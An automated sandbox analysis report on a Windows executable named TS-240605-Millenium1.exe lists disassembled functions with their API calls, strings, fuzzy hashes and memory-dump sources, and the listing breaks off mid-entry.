API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
Instruction ID: 3f28026980f7f94f7b15d9a6c3a5c27fafd5f8a850634ed83f8ec2e57bf44ccc
Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
Instruction Fuzzy Hash: D4116020B4960243FA989B65AB431B961725F663B2F144334F9BDF76C6DE2CB4019610

Function 00007FF6CEB3BFD4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6CEB3BFE5
FlsSetValue.KERNEL32 ref: 00007FF6CEB3C004
FlsSetValue.KERNEL32 ref: 00007FF6CEB3C02C
FlsSetValue.KERNEL32 ref: 00007FF6CEB3C03D
FlsSetValue.KERNEL32 ref: 00007FF6CEB3C04E

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
Instruction ID: 76545c4723bb14409d62e9fdf7cdac852c559a6302b9858d49a78dcc7c491607
Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
Instruction Fuzzy Hash: 4B111810A4924743F9A8AE6197531B921724F67376F280734F9BEFB2D6DE2CB8014610

Function 00007FF6CEB369F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB36A2C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB36B56
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB36C0C

Strings

verbose, xrefs: 00007FF6CEB36A00

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
Instruction ID: 05de1792a2b09616eb2fc68e61b524bb7e0560be72fbd169c4215102cf5c8c5d
Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
Instruction Fuzzy Hash: 0991D322A08A4742FB21DE25D65237D37B1EB62B66F844132EAC9D73D9EE3CE4458740

Function 00007FF6CEB40AA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB40D7F

Part of subcall function 00007FF6CEB471A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB471C1

Strings

UTF-8, xrefs: 00007FF6CEB40CFE
ccs, xrefs: 00007FF6CEB40CBA
UTF-16LEUNICODE, xrefs: 00007FF6CEB40D1D

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
Instruction ID: d47f0e3de11f63d2917938d372dc51bdc2b9a07db43eb29ee859a63ad1a9fdb3
Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
Instruction Fuzzy Hash: CF816232D08602C5F6655F29C3506783AB0AB33B4AF558436EA89F7696DF3DF4059703

Function 00007FF6CEB2CF80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CEB2CFAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6CEB2D042
RtlUnwindEx.KERNEL32 ref: 00007FF6CEB2D09C

Strings

csm, xrefs: 00007FF6CEB2D029

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
Instruction ID: 4d0c6218dc4d166d3f76aa8a55f7c7603499c9ab372271aa13f99e6d5637f4e1
Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
Instruction Fuzzy Hash: 8051A122B196028AEB14CF15E558A7973B1EF75B86F108131FA8997798DF7DE841C700

Function 00007FF6CEB2F800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6CEB2F85F
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6CEB2F8AB

Strings

MOC, xrefs: 00007FF6CEB2F873
RCC, xrefs: 00007FF6CEB2F87B

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
Instruction ID: bd220364769b69a7822ae447923ea07d2cf455e9f0c37635468dcd56f218b5a5
Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
Instruction Fuzzy Hash: 5B619032908B8581E7219F15E5453A9B7A0FBA6795F044225EBDCA7B59CF3CD190CB00

Function 00007FF6CEB2FBB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CEB2FBD8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6CEB2FCC0

Strings

csm, xrefs: 00007FF6CEB2FBFA
csm, xrefs: 00007FF6CEB2FD12

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
Instruction ID: 200dc33a51c5e046cfa6f85df305903cf34161e8854cd0abfdb2cb811b933123
Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
Instruction Fuzzy Hash: 7B519D3290828286EB248F15964927977B0FF76B86F144236EACDB7BD5CF3CE4518B01

Function 00007FF6CEB22870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

MessageBoxW.USER32 ref: 00007FF6CEB2297B
MessageBoxA.USER32 ref: 00007FF6CEB22997

Strings

Fatal error detected, xrefs: 00007FF6CEB22951, 00007FF6CEB22989
%s%s: %s, xrefs: 00007FF6CEB228F6

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
Instruction ID: f2f0c22937fc5f34b98a2473ff58f4f172538c47995d44a63af826b820219771
Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
Instruction Fuzzy Hash: 1A31857262868281E620DF10E5516FAA374FFA5BC5F844036F6CDA7A99DF3CD605CB40

Function 00007FF6CEB24340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

CreateFileW.KERNEL32(00000000,?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243A8
GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243C8
CloseHandle.KERNEL32(?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243D3

Strings

\\?\, xrefs: 00007FF6CEB243F7

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
String ID: \\?\
API String ID: 2226452419-4282027825
Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
Instruction ID: 991eb7f15a2a12c30f94f16cb76a24187fed8522a6d70698a4cacd04e766b6a6
Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
Instruction Fuzzy Hash: 4021D562B0869245E620DF21F5443B9A261EFA57D5F440132EF9D93B94DF3CD548CB00

Function 00007FF6CEB3D350 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6CEB3D3CF
WriteFile.KERNEL32 ref: 00007FF6CEB3D697
WriteFile.KERNEL32 ref: 00007FF6CEB3D6DD
GetLastError.KERNEL32 ref: 00007FF6CEB3D793

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
Instruction ID: 70ac83346e5dc870156f27a1002dd8e638ba15253af5fab6d64597fe7315286a
Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
Instruction Fuzzy Hash: 33D11276B08A418AE711CF65C6402FC37B1FB66799B144236EF9DA7B99DE38D406C300

Function 00007FF6CEB36044 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6CEB36077
GetFileInformationByHandle.KERNEL32 ref: 00007FF6CEB360D9
GetLastError.KERNEL32 ref: 00007FF6CEB3616A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF6CEB35F7C), ref: 00007FF6CEB361B6

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
Instruction ID: e741881e36f4da3c8181a7610da9dad25153d742af4f1670b870094ea6a79839
Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
Instruction Fuzzy Hash: 8C51A122E08A428AF710DF71DA413BD33B1AB66B69F105535EE8DA768ADF38D5508740

Function 00007FF6CEB22310 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6CEB22344
SetWindowLongPtrW.USER32 ref: 00007FF6CEB22366
GetWindowLongPtrW.USER32 ref: 00007FF6CEB22390
InvalidateRect.USER32 ref: 00007FF6CEB223B0

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
Instruction ID: 5a777cbd47421da1a4206677880bbb477760c862110c5e337d7042ff351dcc0b
Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
Instruction Fuzzy Hash: E811A921E1854246FB549F69F7482B91271EFBABC2F44C031FAC9D6B99CD3CE4C58600

Function 00007FF6CEB46A6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB425B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB425E3

_get_daylight.LIBCMT ref: 00007FF6CEB46B84
_get_daylight.LIBCMT ref: 00007FF6CEB46B95

Strings

?, xrefs: 00007FF6CEB46B15

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
Instruction ID: a587596732f40aa6a3c93a710417873630e9d6e3e2778f3a335a7e2dd71db133
Opcode Fuzzy Hash: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
Instruction Fuzzy Hash: D041F712A0874746FB249F25D64237A6670EBA2BA5F144236FEDC97ADDDE3CD441C700

Function 00007FF6CEB39DC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB39DFA

Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6CEB2C335), ref: 00007FF6CEB39E18

Strings

C:\Users\user\Desktop\TS-240605-Millenium1.exe, xrefs: 00007FF6CEB39E06

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\TS-240605-Millenium1.exe
API String ID: 2553983749-1758221888
Opcode ID: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
Instruction ID: 419cc07af485af3e94b05d5b5ac49117ce59871570be8e4d52832dd283b6210b
Opcode Fuzzy Hash: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
Instruction Fuzzy Hash: C8419236A08B1286EB14DF25A6820B863B4EF567D5F545036FACEE7B89DE3CE4418340

Function 00007FF6CEB3D9E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6CEB3DAFF
GetLastError.KERNEL32 ref: 00007FF6CEB3DB21

Strings

U, xrefs: 00007FF6CEB3DAAB

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
Instruction ID: 7e9f3fbb1f33194b99cd8a7c30ca7888e99f9a0567924394095c2da4bc652ce2
Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
Instruction Fuzzy Hash: 4141B132A18A4286DB208F65E5453BA6770FBA9785F444031EE8DD7798EF3CD545CB40

Function 00007FF6CEB40108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6CEB40148
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6CEB4019A

Strings

:, xrefs: 00007FF6CEB4015E

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
Instruction ID: fb621ac8880259b64b515eb5f7497b99c8facd556366ced9e9711e60932acf82
Opcode Fuzzy Hash: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
Instruction Fuzzy Hash: 3521E472B0868282FB209F11D54427E73B2FBA5B45F458036FACDA3684DF7CE9448B51

Function 00007FF6CEB22C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

MessageBoxW.USER32 ref: 00007FF6CEB22D05
MessageBoxA.USER32 ref: 00007FF6CEB22D21

Strings

Error detected, xrefs: 00007FF6CEB22CDB, 00007FF6CEB22D13

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
Instruction ID: f2b0f73656092aa50857438d3688e61cbd6381cbf876bced7261bcd0ee67e612
Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
Instruction Fuzzy Hash: BA216072628A8291EB20DF10E5516FAA374FFA5785F801136FACDA7A59DF3CD205CB40

Function 00007FF6CEB22B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

